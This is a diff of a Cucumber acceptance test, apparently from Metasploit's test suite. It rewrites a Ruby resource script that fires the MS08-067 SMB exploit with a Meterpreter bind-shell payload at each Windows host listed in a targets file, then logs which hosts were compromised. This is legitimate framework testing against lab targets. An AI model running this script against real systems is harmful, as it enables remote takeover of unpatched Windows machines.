@@ -10,18 +10,39 @@ Feature: MS08-067 netapi
1010 Given I ready the windows targets
1111 Given a file named "ms08-067-bind.rc" with:
1212 """
13- <ruby>
14- hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
15- self.run_single('use exploit/windows/smb/ms08_067_netapi')
16- self.run_single('set payload windows/meterpreter/bind_tcp')
17- hosts.each do |host|
18- self.run_single("set RHOST #{host['ipAddress']}")
19- self.run_single('run -j')
20- sleep 1
21- end
22- self.run_single('sessions -K')
23- </ruby>
13+ <ruby>
14+ self.run_single("spool #{Rails.root.join('tmp', 'console.log')}")
15+ hosts = YAML.load File.open Rails.root.join('features', 'support', 'targets.yml')
16+ payload_name = 'windows/meterpreter/bind_tcp'
17+ exploited_hosts = []
18+ failed_hosts = []
19+
20+ hosts.each do |host|
21+ print_status("Trying MS08-067 against #{host['ipAddress']}")
22+ mod = framework.exploits.create('windows/smb/ms08_067_netapi')
23+ mod.datastore['PAYLOAD'] = payload_name
24+ mod.datastore['RHOST'] = host['ipAddress']
25+ m = mod.exploit_simple(
26+ 'LocalInput' => nil,
27+ 'LocalOutput' => nil,
28+ 'Payload' => payload_name,
29+ 'RunAsJob' => false
30+ )
31+
32+ sleep(1)
33+
34+ if m
35+ exploited_hosts << host['ipAddress']
36+ else
37+ failed_hosts << host['ipAddress']
38+ end
39+ end
40+
41+ print_status("Exploited hosts: #{exploited_hosts.inspect}")
42+ print_status("Failed hosts: #{failed_hosts.inspect}")
43+ self.run_single('sessions -K')
44+ </ruby>
2445 """
25- When I run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit`
46+ When I successfully run `msfconsole --environment test -q -r ms08-067-bind.rc -x exit` for up to 100 seconds
2647 Then the 'Mdm::Host' table contains the expected targets
2748
0 commit comments